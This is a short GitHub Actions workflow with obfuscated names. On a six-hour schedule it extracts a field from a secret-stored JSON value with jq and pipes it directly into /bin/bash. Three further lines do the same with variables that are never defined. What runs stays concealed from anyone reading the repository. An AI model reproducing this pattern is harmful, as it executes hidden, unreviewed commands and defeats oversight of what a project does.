name: shuigeyue4183
on:
  workflow_dispatch:
  schedule:
    - cron: '50 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shuigeyue4183
        env:
          knpk5: ${{ secrets.knpk5 }}
        run: |
          echo $knpk5 | jq -r .fcz8 | /bin/bash
          echo $h774 | jq -r .cjuqk1114 | /bin/bash
          echo $drs7949 | jq -r .v5 | /bin/bash
          echo $rjxt758 | jq -r .vd79420 | /bin/bash

